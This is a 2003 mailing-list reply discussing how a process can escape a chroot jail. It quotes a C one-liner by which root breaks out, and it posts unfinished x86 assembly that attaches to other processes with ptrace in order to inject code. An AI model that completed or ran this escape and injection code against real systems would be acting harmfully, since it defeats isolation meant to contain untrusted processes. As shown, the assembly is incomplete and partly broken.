Re: exiting chroot()

From: Felipe Cerqueira (skylazart) (skylazart_at_core.cx)
Date: 12/20/03 

Date: Sat, 20 Dec 2003 17:41:08 -0200

- skylazart
http://core.cx/skylazart
mailto: skylazart!core.cx

On Sat, 20 Dec 2003, Pieter Droogendijk wrote:

> begin on Mon, 15 Dec 2003 22:20:29 -0200, "Felipe Cerqueira (skylazart)"
> <skylazart@core.cx> wrote:
>
> > its really true.. but, if you can attach in parent process with the child
> > (using ptrace), you could inject the code and break out chroot protection...
> > (existing vulnerabilities like bufferoverflows etc..)
>
> Only root can ptrace another process. See below.

No, its not true.. if you have two process, a prent and child (for
example), both with the same user.. and the child chrooting itself.. I could
attach from child in the parent process and inject arbitrary code...

>
> > so, a important thing to do is change the owner of child process with an
> > unprivileged user.
>
> That's what you should ALWAYS do after chroot()ing. Root can break out of a
> chroot() jail, no problem {int i=255;while (i--) chdir (".."),chroot (".");}
> If you chroot as root, you're just delaying the inevitable.

Thats the same what I said.. but with others words

Im using this code to break out:

.include "syscalls.asm"

.text
.globl main
.align 4

main:
        pushl %ebp
        movl %esp, %ebp

        subl $20, %esp

        leal -12(%ebp), %ecx
        movl $SYS_getpid, %eax
        int $0x80
        movl %eax, (%ecx)

        leal -8(%ebp), %ecx
        movl $100, (%ecx)

L2:
        nop
        movl -12(%ebp), %eax
        movl -8(%ebp), %ebx
        cmpl %eax, %ebx
        je L3 # skipping myself

        movl -8(%ebp), %ebx
        call ptrace_attach
        cmpl $-1, %eax
        je L3 # attach failed

        movl -8(%ebp), %ebx
        call ptrace_detach

L3:
        leal -8(%ebp), %ecx
        addl $1, (%ecx)
        cmpl $100000, (%ecx)
        jle L2
                        # loop finished

        movl $10, %edi
        call ptrace_writedata

        addl $20, %esp

        xorl %eax, %eax
        popl %ebp
        ret

###############################
## exit ();
## Args: ebx -> status

exit:
        movl $SYS_exit, %eax
        int $0x80

###############################
## ptrace_attach ();
## Args: ebx -> pid
ptrace_attach:
        movl $SYS_ptrace, %eax
        movl %ebx, %ecx
        movl $PTRACE_ATTACH, %ebx
        xorl %edx, %edx
        xorl %esi, %esi
        int $0x80
        test %eax, %eax
        jnz L0

# do until WIFSTOPPED (status)
L0_1:
        movl $SYS_waitpid, %eax
        movl %ecx, %ebx # pid
        leal -4(%ebp), %ecx
        movl $WUNTRACED, %edx
        int $0x80
        movl (%ecx), %ecx
        shl $24, %ecx
        cmp $0x7f000000, %ecx # WIFSTOPPED?
        jne L0_1

        ret
# ptrace_attach (pid) failed
L0:
        movl $-1, %eax
        ret

###############################
## ptrace_detach ();
## Args: ebx -> pid

ptrace_detach:
        movl $SYS_ptrace, %eax
        movl %ebx, %ecx
        movl $PTRACE_DETACH, %ebx
        xorl %edx, %edx
        xorl %esi, %esi
        int $0x80
        test %eax, %eax
        jnz L1
        ret
# ptrace_detach (pid) failed
L1:
        movl $-1, %eax
        ret
###############################
## ptrace_writedata ();
## Args: ebx -> pid,
## ecx -> addr,
## edx -> *ptr,
## edi -> length

ptrace_writedata:

        pushl %ebp
        movl %esp, %ebx

        subl $16, %esp

        movl %ebx, %ecx # store pid into ecx
                                # initializing the local vars
        leal -4(%ebp), %eax # counter (displacement) -4(%ebp)
        movl $0, (%eax)
        leal -8(%ebp), %eax
        movl %edi, (%eax) # saving length -8(%ebp)

L4:
        movl $SYS_ptrace, %eax
        movl $PTRACE_POKETEXT, %ebx

        leal -4(%ebp), %eax
        addl $4, (%eax)

        movl -4(%ebp), %eax
        movl -8(%ebp), %ebx
        cmpl %eax, %ebx
        jle L4

        addl $16, %esp
        pop %ebp
        ret

its not really finished ... (U can finish yourself)

>
> --
> begin signature:
> char*x(c,k,s)char*k,*s;{if(!k)return*s-36?x(0,0,s+1):s;if(s)if(*s)c=10+(c?(x(
> c,k,0),x(c,k+=*s-c,s+1),*k):(x(*s,k,s+1),0));else c=10;printf(&x(~0,0,k)[c-~-
> c+"1"[~c<-c]],c);}main(){x(0,"^[kXc6]dn_eaoh$%c","-34*1'.+(,03#;+,)/'///*");}
>

Relevant Pages